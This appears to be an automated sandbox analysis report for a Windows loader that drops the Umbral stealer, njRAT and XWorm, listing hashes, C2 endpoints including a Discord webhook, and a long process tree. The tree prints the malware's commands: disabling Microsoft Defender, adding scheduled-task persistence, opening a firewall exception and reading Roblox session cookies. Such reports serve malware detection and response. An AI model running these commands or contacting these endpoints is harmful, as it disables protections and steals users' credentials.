Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
10-10-2024 10:47
General
-
Target
loader.exe
-
Size
5.2MB
-
MD5
c136329a989aad9543c913f9197a01fe
-
SHA1
0b3bdab50947cf330243938c9ccb3e685c43457b
-
SHA256
9b802ef1b1e58a521a45dbd45c48c75c5b7f9ac53b273d6d2cf868c1f6d46885
-
SHA512
fa7a7efa10b4da760b7d281aa235fa4bb4ce28d12796f28632fd653ae184a6f09bc796c18ba1aa3253f713af0334d97f040dc762a8a1d25352dc7308d49b8590
-
SSDEEP
98304:fKYhdZRJ8os9WXz/DsEAE4SfTQ3+5wJCn9cK4KwrUWxeNVSreDGknLjiSXBI:CYhdo0D/D1J8+mM9Y/gNIsGkLj
Score
10/10
Malware Config
Extracted
Family
umbral
C2
https://discord.com/api/webhooks/1260642604438126643/aa_UuahSUZkuOs2VlSIBCQbkyeOFMP2Ohl9qSBW53DeOIykNwknCmzQV8l5t08t9fhd5
Extracted
Family
njrat
Version
0.7d
Botnet
HacKed
C2
147.185.221.20:49236
Mutex
6a8a3b6e5450a823d542e748a454aa4c
Attributes
-
reg_key
6a8a3b6e5450a823d542e748a454aa4c
-
splitter
|'|'|
Extracted
Family
xworm
Version
5.0
C2
testarosa.duckdns.org:7110
Mutex
5ZpeoOe6AtQfr6wU
Attributes
-
Install_directory
%AppData%
-
install_file
Ondrive.exe
aes.plain
Signatures
-
Detect Umbral payload 17 IoCs
-
Detect Xworm Payload 3 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Xworm
Xworm is a remote access trojan written in C#.
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Using powershell.exe command.
-
Drops file in Drivers directory 1 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"9⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"10⤵
- Executes dropped EXE
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid11⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"11⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"12⤵
- Executes dropped EXE
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid13⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"13⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"13⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"13⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"14⤵
- Executes dropped EXE
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid15⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"14⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"14⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"15⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"15⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"15⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"16⤵
- Executes dropped EXE
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid17⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"16⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"16⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"17⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"17⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"18⤵
- Executes dropped EXE
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid19⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"18⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"19⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"19⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"19⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"20⤵
- Executes dropped EXE
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid21⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"20⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"21⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"21⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"21⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"22⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid23⤵
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"23⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 223⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY23⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption23⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory23⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid23⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name23⤵
- Detects videocard installed
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause23⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"22⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"23⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"23⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"23⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"24⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"24⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"25⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"25⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"25⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"26⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"26⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"27⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"27⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"27⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"28⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"28⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"29⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"29⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"29⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"30⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"30⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"31⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"31⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"31⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"32⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"32⤵
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"33⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"33⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"33⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"34⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"34⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"35⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid36⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"35⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"36⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"36⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"36⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"37⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid38⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"37⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"37⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"38⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"38⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"39⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid40⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"39⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"40⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"40⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"41⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid42⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"41⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"42⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"42⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"43⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid44⤵
-
-
-
